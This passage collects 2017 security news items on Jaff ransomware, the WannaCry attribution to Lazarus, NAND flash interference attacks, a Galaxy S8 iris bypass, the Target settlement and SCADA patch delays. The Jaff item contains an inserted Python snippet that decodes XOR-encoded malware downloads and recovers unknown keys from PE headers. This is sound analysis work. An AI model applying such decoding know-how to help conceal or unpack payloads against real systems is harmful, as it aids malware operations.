The Chinese version of Windows 10 does not allow access to features that are not needed by Chinese government employees like Microsoft's OneDrive service that let people store their documents and files on Microsoft-controlled data centers.
Apparently, the Chinese officials don't want anyone to access their data, so they will keep their data locked down on their own computers in an attempt to have full control over it.
Manage Telemetry Data Collection & Updates
Last year's outcry over Microsoft's silent collection of telemetry data from users' computers may have led Chinese officials to demand control over telemetry in their version of Windows, preventing Microsoft from collecting data on Chinese citizens.
In other words, ordinary Windows 10 users around the world have no option to turn telemetry off entirely, but the Chinese government will.
"For more than two decades, Microsoft has had the distinct honor to work in China, learning and advancing technology together," executive vice president Terry Myerson writes on the Windows 10 Blog.
"Over the last two years, we have earnestly cooperated with the Chinese government on the security review of Windows 10. The Chinese government has the highest standards for security."
A release date for Windows 10 China Government Edition has not yet been announced, but three Chinese government groups have already announced plans to adopt it.
These three government groups are China Customs, Westone Information Technology and the City of Shanghai on the national, state-owned and regional enterprise levels, respectively.
Besides this, Lenovo has also announced its plans to be the first OEM partner to have devices that come preinstalled with Windows 10 China Government Edition.


New Jaff Ransomware Variant Emerges

25.5.2017 securityweek  Ransomware

Although it dominated headlines over the past couple of weeks, WannaCry wasn't the only ransomware family running rampant. Another active threat was Jaff, a family that emerged just days before the WannaCry outbreak.

Right from the start, Jaff stood out because it was being distributed by the Necurs botnet and was using a similar ransom page design as Locky. Thus, it didn’t take long for security researchers to associate the new threat with the actors behind Locky and Dridex, who also launched the Bart ransomware last year.

The ransomware appended the .jaff extension to encrypted files and demanded a hefty ransom of around 2 Bitcoin. The infection vector was PDF files sent as attachments in spam emails.

A newly observed Jaff variant continues to use Necurs and PDF files for infection, but moved away from the .jaff extension and the Locky-like ransom note, Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says.

The ransomware now appends the .wlu extension to the encrypted files and uses a ransom note featuring green fonts on a dark background. The security researcher also noticed that the ransomware authors ask for a 0.35630347 Bitcoin ransom now.

First observed on Tuesday, May 23, the spam emails distributing the new Jaff variant use a fake invoice theme. They carry a PDF attachment containing an embedded Word document whose malicious macros infect the machine with the ransomware.

“The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host. The initial HTTP request for Jaff returns an encoded binary that's been XORed with the ASCII string I6cqcYo7wQ,” Duncan reveals.
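Decoding a download like the one Duncan describes, as an added example (not Palo Alto's analysis code or the malware's): a repeating-key XOR is its own inverse, and the zero-filled reserved fields of an ordinary DOS header (offsets 0x1C to 0x3B) leak the key even when it is not known, because 0 XOR k equals k. The "encoded download" is constructed here from a fake PE header so the script runs offline; the key string is the one quoted above.

```python
"""Decode a repeating-key XOR payload like the Jaff download described above.

Added example, not Palo Alto's or the malware's code. The key string is the one
quoted in the article; the "encoded download" is constructed from a fake PE
header so the script runs offline.
"""

KEY = b"I6cqcYo7wQ"          # key string reported for the Jaff downloader


def xor_repeating(data, key):
    """XOR with a repeating key is its own inverse: one function encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data):
    """Sanity check on a decoded blob: 'MZ' stub and 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_key(encoded, key_len, zero_run=(0x1C, 0x3C)):
    """Known-plaintext trick for when the key is not known. In an ordinary DOS
    header the reserved fields e_res..e_res2 (0x1C-0x3B) are zero, and
    0 XOR k == k, so the ciphertext bytes there are the key bytes."""
    start, end = zero_run
    if end - start < key_len:
        raise ValueError("zero run too short to recover a key of this length")
    key = bytearray(key_len)
    for off in range(start, start + key_len):
        key[off % key_len] = encoded[off]
    return bytes(key)


def build_fake_pe():
    """Constructed stand-in for a downloaded executable: a plausible 64-byte
    DOS header followed by a minimal PE signature. Not a real program."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[2:4] = (0x90).to_bytes(2, "little")        # e_cblp, as in MSVC-built files
    hdr[0x18:0x1A] = (0x40).to_bytes(2, "little")  # e_lfarlc
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew: PE header follows at once
    return bytes(hdr) + b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 18  # Machine = i386


def decode_download(encoded, key=None, key_len=len(KEY)):
    """Decode with a known key, or recover it from the header when key is None.
    Returns (decoded_bytes, key_used, is_pe)."""
    if key is None:
        key = recover_key(encoded, key_len)
    decoded = xor_repeating(encoded, key)
    return decoded, key, looks_like_pe(decoded)


if __name__ == "__main__":
    encoded = xor_repeating(build_fake_pe(), KEY)   # what the dropper would fetch
    _, key_used, is_pe = decode_download(encoded)
    print(key_used, is_pe)
```

When the key length is also unknown, the same zero run gives it away: try lengths from 1 upward and keep the first one for which the recovered key decodes the first two bytes to MZ and the PE check passes.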

Like the initial Jaff variant, the new version targets over 400 file types. After completing the encryption process, it drops a ransom note to tell the victim what happened and explain how to pay.

Because of its alleged connection with a large crime group, Jaff has the potential of becoming a major threat fast. WannaCry might have stolen the headlines for the past days, but Jaff is slowly growing to become a prevalent threat.


Vera Enables Multi-Factor Authentication for Specific Data

25.5.2017 securityweek  Safety
Multi-factor authentication (MFA) is the security industry's response to failings in the simple and traditional userID/password authentication approach. MFA is considered to be a primary solution to help defeat phishing and to demonstrate compliance. But it suffers from one major drawback: user friction.

Put simply, MFA delays business. Users don't like it, and business managers see it as a delay in business processes. The industry is responding with attempts to reduce that friction. Earlier this week, Preempt launched a product that applies behavioral-based MFA to specified applications. Now Vera has announced an add-on to its data-centric solution that allows MFA to be limited to specified data.

Vera's methodology is to attach the additional authentication requirement to an existing data classification. Assuming particularly sensitive data is already classified within the Vera product as 'secret' (or perhaps, given the imminence of the European General Data Protection Regulation (GDPR), as 'PII'), then the additional MFA will be automatically applied to all such labeled data.

The result is that any attempted access to that data -- wherever the data is located or whomever the applicant is -- will result in an MFA challenge. This process defends the data against successful phishing (an attacker may steal log-in credentials, but won't get by the MFA challenge) and simultaneously helps ensure compliance with PII-protecting regulations.

"Providing the right level of protection to enterprise data is," explains Prakash Linga, CTO and co-founder of Vera, "key to complying with regulations like the NY DFS and the EU GDPR. Furthermore, the ability to layer context-driven authentication to specific files and emails lets companies appropriately protect their information wherever it travels."

The process does not require that all recipients of Vera MFA-protected data be Vera customers. If a protected document is sent to a trusted but external recipient, Vera will first validate the email address and then challenge the recipient with Vera's native two-factor Twilio-based authentication challenge.

"Alongside our own native capabilities, we're also launching integrations with Duo Security and RSA SecurID to let businesses simplify their multi-factor authentication strategy," announced Chuck Holland, Vera's director of product management, in an associated blog post. The Duo and SecurID integrations are 'out-of-the-box' plug-and-play.

Earlier this month, Vera announced a strategic investment of $15 million led by Hasso Plattner Ventures. Yair Re'em, general partner of Hasso Plattner Ventures, said at the time his firm's first venture into cybersecurity is prompted by "the crumbling state of enterprise security [which] has clearly demonstrated the need for a fundamental paradigm shift in cybersecurity."

Talking about Vera's adoption of data-centric security over perimeter-based security, new board member Chris Rust said, "The enterprise network perimeter has collapsed and those clinging to solutions trying to save or resurrect it are fighting a battle long since lost. Vera is the driving force behind a positive and profound shift away from perimeter-based security and towards a more flexible and reliable data-centric model."

Vera's new MFA offering adds strong authentication to corporate data wherever it travels.


Ex-CIA Chief Says He Warned Russia to Stay Out of Election

25.5.2017 securityweek  CyberSpy
Former CIA director John Brennan said Tuesday that he warned Russia last summer against meddling in the US presidential election but the Russians went ahead and did it, anyway.

"It should be clear to everyone that Russia interfered in our 2016 presidential election process," Brennan said in testimony to the House Intelligence Committee, which is investigating possible collusion between Russia and President Donald Trump's campaign.

"And that they undertook the activities despite our strong protests and explicit warning they not do so," said Brennan, who served as CIA director from 2013 until January of this year when Trump took office.

Brennan told how he called the head of the Russian intelligence service, the FSB, on August 4 of last year.

"I said that all Americans, regardless of political affiliation or whom they might support in the election, cherished their ability to elect their own leaders without outside interference," Brennan said.

"I said American voters would be outraged by any attempt to interfere in the election," he added.

Brennan's interlocutor denied any Russian interference but said he would pass on the warning to President Vladimir Putin, the ex-CIA chief said.

Brennan reiterated that the CIA detected in 2016 possible signs of collusion between Trump associates and Russian officials.

Those contacts are now being investigated by committees in both chambers of the US Congress and by recently appointed special counsel Robert Mueller, a former FBI director.

"I encountered and became aware of information and intelligence that revealed contacts and interactions between Russian officials and US persons involved in the Trump campaign," Brennan said.

He said he did not know if this amounted to outright collusion.

"I know there was a sufficient basis of information and intelligence that required further investigation" by the FBI, he added.

Trump vehemently denies any collusion and says he is the victim of an unprecedented witch hunt.

Brennan also addressed news reports that Trump, in an Oval Office meeting this month with the Russian foreign minister and ambassador, shared highly classified information provided by a US ally about an Islamic State group plot to bring down civilian airliners with bombs hidden in laptop computers.

Brennan said that if these reports are true, Trump violated two intelligence protocols.

First, he said, such intelligence is not shared with ambassadors but rather through intelligence channels.

And before such intelligence is shared, the country that provided it must be warned so as not to jeopardize sources or methods, Brennan said.

"It appears, at least from the press reports, that neither did it go in the proper channels nor did the originating agency have the opportunity to clear language for it," Brennan said.

"That is a problem."


Samsung Investigating Galaxy S8 'Iris Hack'

25.5.2017 securityweek  Mobil
Samsung Electronics is investigating claims by a German hacking group that it fooled the iris recognition system of the new flagship Galaxy S8 device, the firm said Wednesday.

The launch of the Galaxy S8 was a key step for the world's largest smartphone maker as it sought to move on from last year's humiliating withdrawal of the fire-prone Galaxy Note 7s, which hammered the firm's once-stellar reputation.

But a video posted by the Chaos Computer Club (CCC), a German hacking group founded in 1981, shows the Galaxy S8 being unlocked using a printed photo of the owner's eye covered with a contact lens to replicate the curvature of a real eyeball.

"A high-resolution picture from the internet is sufficient to capture an iris," CCC spokesman Dirk Engling said, adding: "Ironically, we got the best results with laser printers made by Samsung."

A Samsung spokeswoman said it was aware of the report and was investigating.

The iris scanning technology was "developed through rigorous testing", the firm said in a statement as it sought to reassure customers.

"If there is a potential vulnerability or the advent of a new method that challenges our efforts to ensure security at any time, we will respond as quickly as possible to resolve the issue."

Samsung's hopes of competing against archrival Apple's iPhone had been pinned on the Galaxy S8 after last year's Note 7 disaster.

The recall debacle cost Samsung billions of dollars in lost profits and hammered its global credibility, forcing it to apologise to consumers and postpone the S8 launch.

But since it was released in April it has received positive reviews and strong orders.

The CCC previously demonstrated a way to defeat Apple's Touch ID fingerprint sensor -- using graphite powder, a laser etching machine and wood glue -- just weeks after the first iPhone 5s hit the shelves.

Traditional PIN protection was "a safer approach than using body features for authentication", Engling said.


Apps Essential to Modern Living But Treated Carelessly: Report

25.5.2017 securityweek  Security
A new research report takes an unusual angle. Rather than analyzing a threat or an attacker, it looks at the psychology of the user -- or more specifically, the user of smartphones and apps. What it found is that the modern use of apps is so interwoven with daily life, they have almost become part of their users' DNA.

The Application Intelligence Report (AIR: PDF) is a new intelligence survey produced by A10 Networks. A10 surveyed 2,000 business and IT professionals in more than 20 different countries -- and it is important to note that these were professionals rather than unemployed teenagers glued to their phones.

The purpose, says Andrew Hickey, a director at A10 Networks, in an associated blog, is to "better understand how the global workforce's experiences and behaviors with apps impact personal and corporate security... Why they use them. Their perception of personal and business security when using them. And potential behavioral risks to businesses and IT teams."

The result is sobering, and could fuel a raft of psychology and sociology theses. It first demonstrates how deeply apps and their use are interwoven into everyday life. For example, 42% of respondents globally say they 'cannot live without their apps' while another 44% said 'it would be a struggle' to live without them.

The detail varies by both age demographic and geolocation. Newly emerged and emerging economies seem particularly attached or reliant on their apps: China (99%), India (97%), Brazil (96%) and South Korea (90%). It is the older economies that seem less reliant. Germany ranks highest of participants who say, 'I can easily live without apps' (30%), followed by France (23%), and Great Britain and Japan (21%). Similarly, respondents under the age of 40 are much more likely to say they cannot live without apps than those over 40.

This basic pattern largely repeated itself throughout the survey. For example, in an emergency that would allow people to take only one item, 45% of respondents elected to grab their phone. It was 74% in China, but only 29% in France.

While details such as these are interesting and possibly surprising (perhaps depending on the reader's geolocation and age demographic), it is the attitude towards security that becomes sobering. "At least four out of five (83%) respondents either agree or strongly agree that they think about security risks when first downloading an app," says the report, "but after that, security becomes much less of a thought or priority in dictating behavior."

One reason seems to be a belief that it is the developer, or the company IT department, that is responsible for app security. Forty-seven percent of respondents "expect to be protected from cyber-attacks by either their company or third-party app developers."

This lax personal attitude to security best shows itself in the use of passwords. One in 10 (11%) of all respondents said they never change their passwords for their apps, while another three out of 10 (29%) use the same password for the majority of their apps. Fewer than one in five (17%) use a different password for every app. The usual demographics apply: 50% of the 21-30 demographic either never change passwords or use the same password the majority of the time, compared with only 26% of those aged over 50.

Surprisingly, the US (49%) is second only to South Korea (52%) in using the same password for the majority of apps -- but less surprisingly, Germany leads in best practices for those who use different passwords (34%).

The effect of poor personal security is borne out in practice. Globally, 13% of all respondents have been the victim of identity theft. This grows to 39% in China (a figure that, pro rata, suggests more people than the entire population of the US). Thirty-one percent of respondents have had their phone hacked; and 24% of respondents under the age of 30 have had their phone stolen.

A10 Networks draws few conclusions from this report, instead inviting its study and promising to 'dig deeper' in the future. "From a cultural perspective," blogs Hickey, "IT can study the app-blended life, consider user behavior as a factor in security planning, build enterprise-wide security awareness and influence a security-minded culture.

"And from a technology perspective, IT pros can use this data to make the case for improved per-app visibility, per-app analytics, performance, removal of security blind spots and implementation of tighter controls across all application environments." But one thing is immediately obvious: companies with a BYOD policy cannot afford to leave the security of mobile devices to the user.


Target agreed to pay $18.5 Million over 2013 data breach
25.5.2017 securityaffairs Incident

Target, the US retail giant, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.
Target, the US retail giant, has entered a settlement with the Attorneys General of 47 states and it has agreed to pay $18.5 million over the data breach suffered in 2013.

Nearly 40 million credit and debit card accounts belonging to Target customers were stolen during the holiday shopping season in 2013.

The payment is intended to cover the costs incurred and to compensate for the damage caused to consumers.


The company will pay the overall amount to the Attorneys General involved in the investigation; $1.2 million goes to the Illinois Attorney General and roughly $1 million to Connecticut, the two states that led the legal action against the company.

According to the settlement, Target accepted to implement an information security program to protect its customer.

“TARGET shall, within one hundred and eighty (180) days after the Effective Date of this Assurance, develop, implement, and maintain a comprehensive information security program (“Information Security Program”) that is reasonably designed to protect the security, integrity, and confidentiality of Personal Information it collects or obtains from Consumers.” reads the settlement.

The Information Security Program shall cover administrative, technical, and physical safeguards appropriate to:

The size and complexity of TARGET’ s operations;
The nature and scope of TARGET’ s activities;
The sensitivity of the Personal Information that TARGET maintains.
The company will adopt further measures to protect its customers, including network segmentation, access control and management, file integrity monitoring, whitelisting, logging, change control, and the adoption of payment card security technologies.

The settlement requires that the security of the company's systems be assessed by a third party, and that the company audit any vendor or subcontractor it works with. Recall that the attackers who broke into the company's payment systems used an HVAC contractor as their entry point.

Target admitted last year that the data breach had cost it $290 million, the company paid $67 million to Visa card issuers, $19 million to MasterCard card issuers, over $20 million to banks and credit unions, and $10 million to the affected consumers.


The NAND Busters Data Storage Chips Vulnerable to Attack
25.5.2017 securityaffairs Vulnerability

Experts found that NAND Data Storage Chips are vulnerable to malicious programs which can corrupt data and even destroy them over time.
Researchers at Carnegie Mellon University, Seagate Technology and Swiss Federal Institute of Technology in Zürich have uncovered a potential flaw in the storage devices that power most cell phones, computers and big data centers around the world. The researchers found that the special chip arrays used to store information are vulnerable to malicious programs which can corrupt data and even destroy the chips over time.

NAND flash memory chips installed on a board array are called solid-state drives (SSDs). The SSDs have all but replaced the venerable magnetic disk hard drives, allowing manufacturers to reduce the size and weight of electronic devices. NAND flash memory chips are found inside most of the current state of the art electronics and often occupy space in our pockets from portable phones, cameras, and USB drives. They are also the heart of massive data centers that power the cloud, holding vast amounts of data for individuals, major corporations, and government.

A key feature of the NAND flash chip is its ability to store a charge without power. The NAND chip contains billions of cells each with different electrical charges which represent the binary ones and zeros that make up data. They are also controlled by an internal architecture which is designed to keep all that data in order. The researchers, working with the assistance of Intel and Seagate, found that the cells inside each chip can be corrupted by programs which abuse the sub-scale electronics and can eventually render them useless.


One such exploit discovered by the researchers is a program that rapidly writes, reads and resets data inside a NAND storage chip. The attacker repeatedly hammers individual cells holding the binary ones and zeros, causing them to generate interference in nearby “victim” cells. The result is a phenomenon called “parasitic capacitance coupling”, which shifts the voltage in adjacent memory cells and thereby changes the value of the data stored in them. The attacker can thus alter the data in targeted victim cells, corrupting data that other programs stored there.

As chips become smaller and more powerful, the space between the electronic connections and memory cells has been reduced as well. The fact that these electronic connections are in some cases only a few molecules apart is like having bare copper wires carrying voltage lying next to each other. They often do not have to touch to create disturbance in other nearby components.

This type of interference attack has been described to be similar to a “Row hammer” attack used against the more familiar RAM (Random Access Memory) chips inside computers, where an attacker bombards a row of memory cells in repeated read-write operations, causing electrical interference that changes the values of nearby cells.

“Row hammer” attacks are deliberately introduced interference using software programs. However, Nature can also cause similar errors inside storage memory chips operating under harsh conditions. For example, solar flares and intense radiation have been known to induce the cells inside computer chips – both RAM and Flash – to change values.

Special programming techniques and manufacturing processes called “RAD” hardening had to be introduced for chips installed inside satellites, military equipment, space craft and nuclear reactors to prevent “bit flipping”, changing cell values induced by the Electro-Magnetic Pulse (EMP) of solar flares, and radiation.

According to the researchers, a malicious program can re-create the same kind of EMP electronic interference on a sub-scale. They discovered that such software can take advantage of the NAND chip design and structure to work around safeguards to target specific cells.

While the NAND memory chip can compensate for damaged cells, as more and more cells are attacked, the chip eventually becomes useless and is unable to reliably store information. The attack can dramatically reduce the usable lifetime of the chip, forcing it to be replaced. In high-end applications such as cloud storage, this replacement usually requires an entire board or bank of chips to be replaced, an expensive and time-consuming process.

However, unlike massive cloud and computer storage arrays, the NAND flash memory chips inside consumer devices are usually not replaceable. The malicious software attack could force an entire device to be replaced such as a cell phone, notepad computer or Internet of Things device.

Researchers also discovered a second method of attack called “Read Disturb”. In this attack, a malicious application performs a very large number of reads in a very short amount of time to induce “Read Disturb” errors that corrupt both data already written to the chip and data that has yet to be written. The basic concept is to corrupt unwritten blocks or cells that are not managed by the chip’s control firmware. The result is that the unused data cells are corrupted and cannot be repaired, because they lie outside of the chip’s management and control.

While this second type of attack does not disrupt data already written by other programs, it does eventually destroy the chip and shorten its usable lifetime.

The researchers also suggested their own form of “RAD” hardening in order to reduce the chance of attacks and increase the lifetime of the NAND flash chips. The best solution was to internally buffer data being read and written to the NAND flash drive itself. The concept is that the buffer will absorb all the read and write activity and then place the data correctly into each NAND memory cell. While this method would consume additional overhead in time, up to 15%, and an additional 2 MB of storage, it would also eliminate the chip vulnerability to being corrupted by either the “Capacitance Coupling” or the “Read Disturbance” attacks.

The research paper, titled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques”, is available at:

https://pdfs.semanticscholar.org/b9bc/a3c9f531002854af48de121cdcc8e0520c7f.pdf

Charles R. Smith is CEO of Softwar Inc., a US-based information warfare company, and a former national security journalist. You can find Softwar at https://www.softwar.net


Qatar's State News Agency Hacked by 'Unknown Entity': Official

24.5.2017 securityweek Hacking
Qatar said Wednesday its official state news agency was hacked and subsequently carried a "false statement" on sensitive regional topics attributed to the country's Emir, Sheikh Tamim bin Hamad Al-Thani.

Amid an apparent wide-scale security breach it was also reported that the agency's official Twitter account had also been attacked.

Among the issues allegedly addressed by the Qatari ruler in the statement were the Palestinian-Israeli conflict, strategic relations with Iran, and comments about Hamas.

There were also alleged negative remarks about Qatar's relationship with the new administration of US President Donald Trump.

Amid the confusion, Doha said the statement which had appeared on its website and was attributed to the country's ruler was completely untrue.

"The Qatar News Agency website has been hacked by an unknown entity," reported the Government Communications Office in a statement.

"A false statement attributed to His Highness has been published."

The communications office added that an investigation would be launched into the security breach.

The "false statement" posted online claimed the emir spoke on Tuesday, two days after the Qatari leader and Trump met in Saudi Arabia as part of the president's recent visit to the Middle East.

The remarks on QNA were picked up and reported by broadcasters in the region, including some in the United Arab Emirates.

They also caused a stir on social media in the Gulf, before Doha scrambled in the early hours of Wednesday morning to deny the claims.

Doha-based broadcaster Al Jazeera also reported that the QNA Twitter account had been hacked and "fake" reports that Qatar was withdrawing ambassadors from several countries in the region were subsequently denied.

The communications office added that the "State of Qatar will hold all those" who committed the breach accountable.

The attack on Qatar's official news agency comes just days after Doha claimed it had been the victim of an orchestrated smear campaign over its alleged "support" for terrorism.

Last weekend, Doha's communications office released an official statement claiming the gas-rich emirate was being attacked by anti-Qatar organisations.

Doha has faced criticism in some quarters for its support of rebel groups fighting Syrian President Bashar al-Assad.

In recent weeks, Qatar has been accused outright of terror funding in articles which have appeared in the American media.

Qatar is also home to the former leader of Hamas, Khaled Meshaal, who earlier this month used his Doha base, where he has lived in exile for several years, to launch a new policy document.


Russian Hackers Infected 1 Million Phones With Banking Trojan

24.5.2017 securityweek Virus
Russia Dismantles Major Cybercrime Operation Targeting Bank Accounts via Android Malware

The Russian Interior Ministry announced on Monday that authorities dismantled a major cybercrime gang that had stolen nearly $900,000 from bank accounts after infecting more than one million Android smartphones with a Trojan.

Authorities said they identified 20 suspects in Moscow and five other regions of Russia. They believe the group was led by a 30-year-old living in the city of Ivanovo.

Group-IB, the Russian cybersecurity firm that assisted the government’s investigation, reported that 16 members of the group were detained in November 2016, while the last active member was apprehended in April.

The group used an Android banking Trojan dubbed “Cron,” which researchers first spotted in March 2015, when cybercriminals had been distributing it disguised as Viber and Google Play apps.

Roughly one year later, experts noticed that someone had offered to rent an Android banking Trojan dubbed “Cron Bot.” In an analysis of the mobile malware market, IBM X-Force researchers reported in April 2016 that Cron Bot had been leased for between $4,000 and $7,000, depending on the package.

The cybercrime gang targeted by Russian authorities used spam SMS messages to deliver the Trojan to individuals in Russia. The messages informed recipients that their ads or photos had been posted on a website, and included links to a site that tricked users into downloading and installing the malware. The threat had been disguised as various apps, including Avito, Pornhub, Framaroot and Navitel.

Once it infected a device, the Trojan allowed the cybercrooks to steal and hide SMS messages coming from banks, and send SMSs to specified numbers. Since many Russian banks allow their customers to conduct transactions via SMS, these features allowed the fraudsters to transfer money from the victims’ accounts into their own.

According to Group-IB, the gang opened more than 6,000 bank accounts to which they transferred the stolen funds. Investigators said the Cron malware was used to steal an average of $100 (8,000 rubles) from 50-60 bank customers each day.

The cybercriminals managed to infect more than one million smartphones and stole nearly $900,000 (50 million rubles).

Following the success of their operation in Russia, the group decided to expand to other countries with the aid of a banking Trojan named Tiny.z, which they rented for $2,000 per month. Tiny.z uses overlay screens adapted to each targeted bank’s mobile application in order to trick victims into handing over personal and financial details that can be leveraged to steal money from their account.

The Cron gang had been planning on hitting France first, and they developed web injections for several of the country’s banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d'Epargne, Societe Generale and LCL. However, law enforcement managed to disrupt their operations before they could launch attacks on French banks.


WannaCry 'Highly Likely' Work of North Korean-linked Hackers, Symantec Says

24.5.2017 securityweek Ransomware
North Korea-linked Lazarus Hacking Group is "Highly Likely" to be Responsible for the Global "WannaCry" Ransomware Attack, Symantec Says

Analysis of the tools and infrastructure used in the WannaCry ransomware attacks reveal a tight connection between the threat and the North Korean hacking group Lazarus, Symantec claims.

The global outbreak on May 12 drew the world’s attention to WannaCry, but the threat had been active before that, the security researchers say. Over 400,000 machines have been hit by WannaCry to date, although not all had been infected, courtesy of a kill-switch domain registered shortly after the attack began.

The first WannaCry variant, however, emerged in February, and security researchers already discovered a possible tie between it and the Lazarus group, although some suggested such a connection was far-fetched.

North Korea has denied involvement in the ransomware outbreak.

The Lazarus group (also known as BlueNoroff) was previously associated with a number of devastating attacks, including the Sony Pictures hack in 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. Recently, Kaspersky suggested that the group could be the most serious threat to banks.

Symantec now says that tools previously associated with the group were found on computers infected with WannaCry. Before the May 12 attack, the ransomware was used in a small number of targeted campaigns in February, March, and April, and the variants are almost identical, save for the method of propagation (the recent version uses the NSA-linked EternalBlue exploit).

According to Symantec, these attacks show “substantial commonalities in the tools, techniques, and infrastructure used by the attackers and those seen in previous Lazarus attacks, making it highly likely that Lazarus was behind the spread of WannaCry.”

Despite that, however, “the WannaCry attacks do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign,” the security researchers admit. Prior to the May 12 campaign, WannaCry was using stolen credentials to spread across infected networks and didn’t employ the leaked EternalBlue exploit.

After the first WannaCry attack in February, experts discovered three pieces of malware linked to Lazarus on the victim’s network, including the Volgmer Trojan and two variants of the Destover backdoor (the disk-wiping tool used in the Sony Pictures attacks).

Moreover, the researchers discovered that WannaCry used the Alphanc Trojan for distribution in the March and April attacks, and that this malicious program is a modified version of the Lazarus-linked Duuzer backdoor.

Symantec also found the Bravonc backdoor, which has similar code obfuscation as WannaCry and Fakepude info-stealer (also linked to Lazarus), and the Bravonc Trojan, which used the same IP addresses for command and control (C&C) as Duuzer and Destover, both linked to Lazarus.

Finally, there is the shared code between the previous WannaCry ransomware version and the Lazarus-linked Contopee backdoor.

The February WannaCry attack hit a single organization but compromised over 100 computers within two minutes after the initial infection. A variant of the Mimikatz password-dumping tool was used for compromise, with a second tool used to copy and execute WannaCry on other network computers using the stolen passwords.

In addition to these tools, the security researchers found five other pieces of malware on a second computer on the victim’s network, and three of them were linked to Lazarus: Volgmer and the two variants of Destover.

A new sample of WannaCry emerged in late March, and five organizations were infected with it. The Alphanc and Bravonc backdoors were employed in these attacks, with the former used to drop WannaCry onto the compromised computers of at least two victims. Alphanc is believed to be an evolution of Duuzer, a sub-family of the Destover wiping tool used in the Sony attacks.

These attacks hit organizations spanning a range of sectors and geographies, but Symantec found evidence of the tools used in the February attacks on the computers compromised in March and April as well.

The Bravonc Trojan was used to deliver WannaCry to the computers of at least two other victims, the security researchers say. The malware connects to a C&C server hosted at the same IP address as the IP address used by Destover and Duuzer samples, and which was also referred to in a Blue Coat report last year.

“The incorporation of EternalBlue transformed WannaCry from a dangerous threat that could only be used in a limited number of targeted attacks to one of the most virulent strains of malware seen in recent years. It caused widespread disruption, both to organizations infected and to organizations forced to take computers offline for software updates,” Symantec explained.

The security firm also notes that the passwords used to encrypt the ZIP files embedded in the WannaCry dropper are similar across versions ("wcry@123", "wcry@2016", and "WNcry@2ol7") suggesting they come from the same actor. Further, the use of a small number of Bitcoin addresses in the initial version and its limited spread indicates that it wasn’t a ransomware family shared across cybercrime groups.

“Aside from commonalities in the tools used to spread WannaCry, there are also a number of links between WannaCry itself and Lazarus. The ransomware shares some code with Backdoor.Contopee, malware that has previously been linked to Lazarus. One variant of Contopee uses a custom SSL implementation, with an identical cipher suite, which is also used by WannaCry. The cipher suite in both samples has the same set of 75 different ciphers to choose from (as opposed to OpenSSL where there are over 300),” Symantec says.

The small number of earlier WannaCry attacks provides sufficient evidence to link the ransomware to Lazarus, Symantec says, given the significant use of tools, code, and infrastructure previously associated with the group. The company also notes that the leak of the EternalBlue exploit was what turned the malware into a far more potent threat than it would have been had it continued to use its own tools.


Average Patching Time for SCADA Flaws Is 150 Days: Report

24.5.2017 securityweek ICS
Supervisory control and data acquisition (SCADA) systems, particularly human-machine interfaces (HMI), can be a tempting target for malicious actors, but it takes vendors, on average, 150 days to patch vulnerabilities in these types of products, according to a new report from Trend Micro and the Zero Day Initiative (ZDI).

The report published on Tuesday is based on the analysis of hundreds of vulnerabilities documented in 2015 and 2016 by ICS-CERT and ZDI.

Researchers pointed out that attackers may target the HMI of a SCADA system for several reasons. Since HMI is a critical component in the management of industrial systems, including critical infrastructure, it can provide access to information that may be highly valuable in a sophisticated attack.

Attackers can also cause physical damage to SCADA equipment once they have compromised the HMI. Furthermore, malicious actors could leverage the HMI to disable alarms and notifications designed to alert operators of dangerous configurations or values.

Since HMIs are typically Windows-based applications rather than web-based apps, vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery (CSRF) are less common. The most common types of flaws uncovered in the past two years are related to lack of authentication/authorization and weak default configurations (23%), memory corruption bugs (20%), credential management vulnerabilities (19%), and code injections (9%).

The average time from disclosure to the release of a patch has not improved much in the past four years. While there are some vendors that manage to patch SCADA vulnerabilities within one week of disclosure, the average time has been roughly 150 days in 2015 and 2016.

Experts pointed out that some smaller vendors, such as Cogent Real-Time Systems and Trihedral Engineering, patch vulnerabilities faster, while larger companies, such as ABB and GE, have an average response time of more than 220 days.

Average time it takes to release patches for SCADA products

Compared to other industries, SCADA vendors are roughly at the same level as cybersecurity firms when it comes to how fast they patch vulnerabilities. Vendors of popular software, such as Microsoft, Apple, Oracle and Adobe, have a response time of under 120 days, while business software developers are significantly slower, with an average of 189 days.

Trend Micro’s report includes case studies for each type of vulnerability affecting SCADA systems. The case study for memory corruption vulnerabilities describes a buffer overflow in Advantech’s WebAccess HMI, which could have been exploited to execute arbitrary code with elevated privileges.

As for credential management issues, which include hardcoded passwords and insufficiently protected credentials, the security firm shared an analysis of the MDS PulseNET product from General Electric (GE).

The case studies also cover code injections in Cogent DataHub, and authentication and authorization-related flaws in Advantech WebAccess and Siemens SINEMA Server.

The complete report, titled “Hacker Machine Interface - The State of SCADA HMI Vulnerabilities,” is available for download in PDF format.


Hackers Defeat Samsung Galaxy S8 Iris Scanner

24.5.2017 securityweek Mobil
Hackers of the Chaos Computer Club (CCC) in Germany have managed to defeat the iris recognition system on Samsung’s flagship Galaxy S8 smartphones.

The Samsung Galaxy S8 has several biometrics-based authentication systems, including face recognition, a fingerprint scanner, and an iris scanner. The iris authentication, which allows users to unlock their device and authorize payments, is advertised by Samsung as “one of the safest ways to keep your phone locked.”

While an individual’s iris is unique, researchers from CCC showed that Samsung’s iris scanner can be defeated by showing it a picture of the victim’s eye. It’s worth noting that members of the CCC were the first to bypass Apple’s fingerprint-based Touch ID system after its introduction in 2013.

